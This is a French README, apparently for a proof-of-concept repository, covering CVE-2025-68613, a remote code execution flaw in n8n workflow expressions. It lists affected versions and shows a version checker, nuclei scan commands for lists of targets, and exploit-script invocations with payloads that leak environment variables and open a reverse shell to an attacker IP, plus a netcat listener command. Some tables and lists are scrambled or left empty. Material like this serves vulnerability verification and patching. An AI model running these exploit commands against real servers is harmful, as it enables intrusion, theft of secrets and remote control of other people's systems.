
CVE-2025-68613

Sévérité : 🔴 Critique Impact : Exécution de code à distance Plateforme concernée : n8n (automatisation de workflows)
CVE-2025-68613 est une vulnérabilité de sécurité critique dans n8n, une plateforme open-source d'automatisation de workflows. Le problème permet à un attaquant authentifié d'exécuter du code arbitraire sur le serveur en abusant de l'évaluation des expressions de workflow.
💥 Pourquoi c'est dangereux : Les expressions malveillantes sont évaluées dans un contexte qui n'est pas correctement isolé (sandbox), permettant l'accès au runtime sous-jacent.

En cas d'exploitation, un attaquant pourrait :
L'attaque s'exécute avec les mêmes privilèges que le service n8n, amplifiant son impact.
| Métrique | Valeur |
|---|---|
| CVSS v3.1 | ~9.9–10.0 |
| Confidentialité | Élevée |
| Intégrité | Élevée |
| Disponibilité |
➡️ L'authentification est requise, mais aucun accès administrateur n'est nécessaire.
🚫 Vulnérables :
0.211.0 → 1.120.31.121.0✅ Corrigées :
1.120.41.121.11.122.0 et plus récentes(Ne supprime PAS complètement la vulnérabilité)
CVE-2025-68613.py — Vérificateur distant de version et d'exposition (Sûr)sudo python3 CVE-2025-68613.py -u http://127.0.0.1:5678
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2
--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -u http://targets:5678
Ou si vous souhaitez analyser une liste d'hôtes, exécutez :
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -l targets.txt
Exemple de sortie
Exemples d'utilisation :
Fuite de variables d'environnement :
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload env_leak
Obtenir les infos utilisateur :
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload id
Shell inversé (démarrez d'abord l'écouteur : nc -lvnp 4444) :
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload reverse_shell --attacker_ip YOUR_IP --attacker_port 4444
Ce script est destiné uniquement aux tests de sécurité autorisés sur les systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester.
🔒 Ce script est une preuve de concept (PoC) pour CVE-2025-68613 dans n8n.
📚 Il est fourni strictement à des fins éducatives et uniquement pour des tests de sécurité autorisés.
🛡️ Utilisez-le exclusivement sur les systèmes que vous possédez, contrôlez ou pour lesquels vous avez une autorisation écrite explicite de tester.
🚫 Toute utilisation non autorisée contre un système est illégale et peut violer les lois (ex. : lois sur la fraude et les abus informatiques).
❌ L'auteur et toute partie associée déclinent toute responsabilité en cas d'utilisation abusive, de dommages ou de conséquences juridiques.
✅ Utilisez-le de manière responsable, éthique et en totale conformité avec toutes les lois et réglementations applicables.
🔐 Si vous effectuez des tests d'intrusion, assurez-vous qu'une autorisation appropriée (par exemple, des règles d'engagement) est en place.
🛠️ Les chercheurs en sécurité peuvent utiliser ceci pour vérifier les vulnérabilités et encourager une correction rapide.
| Élevée |
| Catégorie | Info |
|---|
| CVE ID | CVE-2025-68613 |
| Produit | n8n |
| Classe de bogue | Injection d'expression |
| Résultat | Exécution de code à distance |
| Accès requis | Utilisateur authentifié |
| Correctif disponible | Oui |